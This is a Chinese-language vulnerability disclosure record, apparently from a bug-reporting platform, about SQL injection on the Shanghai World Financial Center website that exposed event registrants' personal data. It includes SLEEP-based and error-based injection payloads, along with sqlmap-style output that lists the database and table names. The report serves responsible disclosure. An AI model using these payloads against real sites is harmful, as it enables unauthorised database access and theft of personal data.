漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:上海环球金融中心,其官网漏洞导致泄漏微信公众号里活动报名(聊遍环球+家庭花园)大量用户数据(家长姓名手机号邮箱其孩子姓名身高重量等)
提交时间:2015-12-03 14:36
修复时间:2016-01-21 10:50
公开时间:2016-01-21 10:50
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情 披露状态:
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经确认,细节仅向厂商公开 2015-12-17: 细节向核心白帽子及相关领域专家公开 2015-12-27: 细节向普通白帽子公开 2016-01-06: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
简要描述: 上海环球金融中心,其官网漏洞导致泄漏微信公众号里活动报名(聊遍环球+家庭花园)大量用户数据(家长姓名手机号邮箱其孩子姓名身高重量等)
详细说明: 域名:**.**.**.** 0x01 2处sql注入: http://**.**.**.**/media_newsletter.php?=3&l=-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A) http://**.**.**.**/media_pressrelease.php?=3&l=-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)
--- Place: GET Parameter: l Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: =3&l=-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A) AND (SELECT 3851 FROM(SELECT COUNT(*),CONCAT(0x3a796b6a3a,(SELECT (CASE WHEN (3851=3851) THEN 1 ELSE 0 END)),0x3a6c75773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- [11:41:34] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 5 web application technology: PHP 5.2.10, Apache 2.2.3 back-end DBMS: MySQL 5.0 [11:41:34] [INFO] fetching database names [11:41:34] [INFO] the SQL query used returns 3 entries [11:41:34] [INFO] resumed: information_schema [11:41:35] [INFO] resumed: swfc-shanghai [11:41:35] [INFO] resumed: test available databases [3]: [*] information_schema [*] swfc-shanghai [*] test
Database: `swfc-shanghai` [31 tables] +----------------------+ | admin_powers | | admin_users | | bus_class | | bus_promotion | | bus_store | | edm_clients | | edm_groups | | edm_mis_email | | edm_mis_email_track | | edm_mis_sms | | edm_register | | edm_register_group | | events | | events_class | | magazine | | media_briefing | | media_image | | media_news | | media_video | | op_roles | | op_users | | reservation | | reservation_forms | | reservation_items | | site_focus | | site_kv | | site_notice | | site_snippet | | weixin_feedback | | weixin_feedback_data | | weixin_log_feedback | +----------------------+
漏洞证明: 修复方案: 修复方案: 1、注入过滤 2、不要把不同网站数据放到一个数据库中
漏洞回应 厂商回应: 危害等级:高
漏洞Rank:14
确认时间:2015-12-07 10:43
厂商回复: CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置.
最新状态: 暂无
漏洞评价:
评价
2015-12-04 10:14 |
chinapanda ( 实习白帽子 | Rank:33 漏洞数:5 | 专注于技术,切不可沉湎于技术)